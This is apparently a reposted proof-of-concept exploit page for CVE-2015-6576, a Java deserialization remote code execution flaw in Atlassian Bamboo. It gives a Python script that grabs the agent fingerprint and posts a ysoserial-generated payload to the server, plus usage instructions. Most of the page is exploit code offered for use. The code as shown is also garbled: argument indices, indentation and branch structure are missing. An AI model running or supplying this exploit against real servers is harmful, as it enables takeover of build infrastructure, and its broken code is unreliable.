A PoC for the Bamboo deserialization exploit (CVE-2015-6576), Bamboo is a continous build server from Atlassian.
introduction Deserialization Vulnerabilities in Java :
Deserialization vulnerabilities in Java are lesser known and exploited (compared to unserialize() in PHP). this bug class can be turned into serverside Remote Code Execution.
usage: ./bamboo.py host port /path/to/payload
# This script is styled after the scripts created by Stephen Breen of Foxglove
# Security in the somewhat infamous "What Do Weblogic, Websphere, JBoss, Jenkins,
# OpenNMS, and Your Application Have in Common? A Vulnerability."
# The Bamboo deserialization vulnerability was discovered and disclosed to
# Atlassian by Matthais Kaiser of Code White. Matthais even gave an excellent talk
# on the subject matter. You can find it on youtube (fast forward to ~42:00 to
# go straight to the demo of this vuln):
# However, Matthais didn't release the code?! So here it is, a PoC for CVE-2015-6576
# usage: ./bamboo.py host port /path/to/payload
# Note that the payload is supposed to be a payload generated by Chris Frohoff's
# ysoserial (https://github.com/frohoff/ysoserial). For example:
# java -jar ./ysoserial-0.0.2-SNAPSHOT-all.jar CommonsCollections1 'firefox' > payload.out
if len(sys.argv) != 4:
print 'Usage: ./bamboo.py host port /path/to/payload'
host = sys.argv
port = sys.argv
payloadObject = open(sys.argv, 'rb').read()
# Get the fingerprint so that we can use it in the object post
r = requests.get('http://'+host+':'+port+'/agentServer/GetFingerprint.action?agent=elastic')
match = re.search(r'^bootstrapVersion=\d+&fingerprint=([^&]+)&', r.text)
r = requests.post('http://'+host+':'+port+'/agentServer/message?fingerprint='+match.group(1), data = payloadObject);
if r.status_code == 401:
print "Didn't work. Probably patched."
elif r.status_code == 500:
print 'It worked!'
print 'I have no idea what happened.'
print 'Failed to get the fingerprint.'
Source : https://github.com/CallMeJonas